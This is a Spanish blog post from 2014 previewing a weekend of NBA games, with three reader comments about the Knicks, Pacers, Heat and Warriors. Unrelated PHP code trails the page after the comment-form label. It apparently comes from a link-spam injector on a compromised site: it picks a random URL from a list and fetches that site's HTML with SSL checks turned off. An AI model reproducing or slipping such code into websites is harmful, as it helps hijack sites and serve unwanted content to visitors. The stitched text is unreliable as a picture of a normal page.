Fin de semana: Quedan 3

28 de March de 2014 por TheDeerHunter

Algunos alcanzan los 72 partidos disputados y afrontan la recta final. Sólo 4 equipos han asegurado matemáticamente su presencia en playoffs y de ellos únicamente Indiana y Miami son campeones de división. Para la inmensa mayoría queda mucho por sudar.

Hoy empezamos a lo bestia. 12 partidos nada menos. El más interesante parece ser el Grizzlies@Warriors a un horario casi prohibitivo (4:30AM) Complicadísima papeleta para los Osos en un momento en el que empatan a victorias tanto con Phoenix, como con Dallas, aunque la victoria les permitiría alcanzar precisamente a los Warriors. Recordemos que uno de ellos no verá playoffs. En esto los Suns reciben a los Knicks y veremos qué versión muestran de ellos mismo.
Un escalón de interés por debajo están el Pacers@Wizards (1AM) y el Blazers@Bulls(2AM) los 4 en zona noble, porque tanto los Heat (@Pistons) como Thunder (vs Kings) como Spurs (vs Nuggets) se enfrentan a equipos que no verán postemporada. En esta situación también se encuentran los Bobcats (@Magic), los Raptors (vs Celtics) y los Nets (vs Cavs)
Por último los Lakers visitan Mineapolis y los Pelicans reciben a los Jazz.

Mañana sábado únicamente 6 choques. El plato fuerte será el Clippers@Rockets (2AM) y también hay un crítico Hawks@Wizards, pero el resto poca cosa. El morbo por ver perder nuevamente a los Sixers ante Detroit y un bonito duelo entre el gran Tim Duncan y su “heredero” Anthony Davis”.

Para cerrar el fin de semana el domingo tendremos 8 encuentros. En horario amable (9PM) Jazz@Thunder y Pacers@Cavs. Aunque lo bueno del día llegará mucho más tarde, Grizzlies@Blazers y Knicks@Warriors (ambos a las 3AM) También veremos un Wolves@Nets, Raptors@Magic, Bulls@Celtics y un Suns@Lakers.

A pasarlo bien, chavalada.

Comenta

3 comentarios a esta entrada

  1. Denise dice:
    #1

    Bueno, Orlando ganando 2 partidos seguidos y acercandose a 2 victorias de Boston y Utah. Vamos, no me jodas, de los últimos 8 clasificados, todos están tankeando a muerte y ninguno lleva más de 2 victorias en los últimos 10 partidos, y van ahora estos tios y se ponen a ganar…

    Que raro lo de Kendall Marshall. Empezó como un tiro haciendo dobles-dobles con la gorra y siendo el mejor de su equipo casi siempre, y desde el All-Star no se qué le ha pasado, pero su rendimiento en el último es pésimo, acentunadose en los últimos 5 encuentros en los que promedia en 29 minutos, 4 puntos, 6 asitencias, un 25% en tiros de campo y ni siquiera ha pisado la linea de tiros libres. De poderse ganar un contratazo va a pasar a volver a firmar por el mínimo creo yo.

    Otra debacle de los Knicks, esta vez ante los Suns. En el descanso ya tenían el partido perdido yendo 22 abajo. Lo Suns cogieron 19 rebotes más que los neoyorquinos, lo que demuestra la falta de intensidad y de ganas de NY, ya que los Suns tampoco es que tengan unos perrros grandes ahí en la zona.

    Entre lo más destacado, Indiana se la ha pegado en Washington, con George tirandose las zapatillas y con Turner haciendo lo mismo que hacía Granger,nada.
    Los Heat se dan un paseo en Detroit sin Chalmers ni Wade, que verguenza de equipo. Para mí, el peor equipo del año en relación calidad/rendimiento
    Y los Warriors consiguen una victoria vital ante los Grizzlies, en un encuentro ganado por Curry él solito,

      Citar

  2. Oli dice:
    #2

    Si acabo de ver a los warriors y lo gana Curry y la intensidad con la que juegan

      Citar

  3. Jose Luis dice:
    #3

    Lo de Indiana es de vergüenza, que sigan perdiendo partidos así…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>